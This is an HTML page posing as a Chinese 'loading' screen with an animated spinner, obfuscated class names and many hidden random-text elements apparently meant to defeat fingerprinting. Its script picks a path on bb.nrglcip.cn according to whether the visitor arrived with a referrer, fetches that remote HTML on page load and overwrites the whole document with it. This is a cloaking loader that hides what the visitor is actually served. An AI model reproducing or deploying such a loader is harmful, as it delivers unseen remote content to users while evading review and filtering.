<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .lvcm09YEIv {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .lvcm09YEIv .G9J7Vuj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .lvcm09YEIv .content {
            line-height: 50px;
            text-align: center
        }

        .lvcm09YEIv .img {
            width: 100%
        }

        .lvcm09YEIv .HOwkaUp2cvf {
            text-align: center
        }

        .lvcm09YEIv .HOwkaUp2cvf span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .lvcm09YEIv .HOwkaUp2cvf span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .lvcm09YEIv .HOwkaUp2cvf span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .lvcm09YEIv .HOwkaUp2cvf span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .lvcm09YEIv .HOwkaUp2cvf span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .lvcm09YEIv .HOwkaUp2cvf span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .lvcm09YEIv .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function jidl4ARSVW(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var dtKFA5e = jidl4ARSVW('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ dtKFA5e +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ dtKFA5e +".html?a=share";
		}
		
        Kk2awC=url+"#"+new Date().getTime();
        Kk2awC && function() {
            $.get(Kk2awC, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >i0ADSaoipzd8xyItaAnJXFozEwFyW654DEwxwzXqrwJKx4hQOIGehEHdErfsspG0PNUd1N5gaz1M1YLwBVCY1FC0mNrLm</h1>
<a  href='#' style='display:none'>BCOftYf8tejAAy0eDyaUoqWBb10t9Gc6Vvzwq5dHLXvVTJYqqQb7t6FR0Wttgod98OZaOrlASQuxEtBCiNLs</a>
<li style='display:none' >TLdFClbBjEBHiz28XGEjCTpmGmP3dz7n8DZv50PgEPzQV778ZRbz8PMoYu</li>
<ul style='display:none' >hZqJ8asJl0ESMHfhAFeae8Skq4JJlgc5hc88Kz5ZfFcYM</ul><div class="lvcm09YEIv">
    <div class="G9J7Vuj">
        <div class="HOwkaUp2cvf">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >hNNR3XOHwyVB</b>
<h1 style='display:none' >Wqqa7CVVrzP3s2KAHtq9f7lhr8NsM0TLy9Jlf5Xycs45hMwib9k0yY</h1>
<span style='display:none'>cbGcVEMe7va2NP7p15D0Hjda878NLziYVluV</span>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>STw0ZFeRMrBdzWTwgsuC</a>
<span style='display:none'>cbGcVEMe7va2NP7p15D0Hjda878NLziYVluV</span>
<div style='display:none'>Ym7SODxLkhPsOJ</div>
<ul style='display:none' >LwsJG51UFWN5rMcb0T8vNlbki1ELc6uBxwAioOUgmS7</ul></body>
</html>